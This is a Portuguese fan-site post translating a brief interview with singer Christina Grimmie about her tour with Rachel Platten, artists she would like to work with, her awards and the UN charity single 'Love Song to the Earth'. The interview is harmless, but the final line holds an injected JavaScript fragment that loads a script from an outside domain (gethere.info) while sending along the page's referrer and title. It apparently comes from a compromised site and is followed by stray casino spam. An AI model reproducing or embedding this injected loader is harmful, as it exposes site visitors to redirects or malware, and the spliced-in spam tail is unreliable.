O site PhiladelphiaStyle realizou uma pequeno Q&A com Christina Grimmie, na qual ela fala sobre a turnê com Rachel Platten e a canção “Love Song to the Earth.” Leia abaixo:

A artista pop e R&B Christina Grimmie é um nome que com certeza irá se tornar mais e mais familiar esse ano. Como uma artista que tocou o corações dos fãs durante a sexta temporada do The Voice, a nativa de 21 anos de New Jersey tem uma American Music Award, foi recentemente nomeada a um Teen Choice Award, e está na estrada com Rachel Platten para uma turnê nacional. Recentemente, a cantora lançou o EP “Side A,” com o single popular “Anybody’s You.”

Antes da sua parada na Filadélfia para turnê, nós nos sentamos com a Christina Grimmie e conversamos sobre com quem ela deseja colaborar, suas realizações e muito mais.

Quais cidades você está mais animada para visitar com a turnê?
Christina Grimmie: Definitivamente perto da minha cidade natal: New York, New Jersey, Filadélfia. As plateias estarão tão animadas! Estou muito animada para Orlando também – talvez eu possa visitar a Disney World.

Com o que você está mais animada nessa turnê com a Rachel Platten?
Christina Grimmie: Estou animada por poder tocar para plateias diferentes todas as noites, apresentar minhas novas músicas. E também, estar em uma cidade diferente todo dia.

No futuro, com quem você mais gostaria de colaborar?
Christina Grimmie: Ficaria honrada se o Skrillex produzisse uma faixa comigo!

Você ganhou um American Music Award, ficou em terceiro lugar na sexta temporada do The Voice, foi nomeada ao Teen Choice Awards, e lançou dois álbuns. De qual dessas coisas você tem mais orgulho?
Christina Grimmie: Não posso escolher apenas um. Para ser honesta, o que eu tenho mais orgulho é de ter crescido com tudo isso – aprendido muito sobre mim mesma como pessoa e artista. Ganhei muita experiência, e só planejo em seguir em frente.

Você gravou “Love Song to the Earth” com grandes cantores como Fergie, Jon Bon Jovi e Paul McCartney para arrecadar fundos para a United Nations. O que doar significa para você?
Christina Grimmie: É incrível, principalmente poder gravar com todos esses grandes artistas. Isso ajuda a conscientizar ainda mais, então é uma honra fazer parte de uma campanha tão grande.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Lucky Lane Podcast: Ep. V – PayPal Deposit Casinos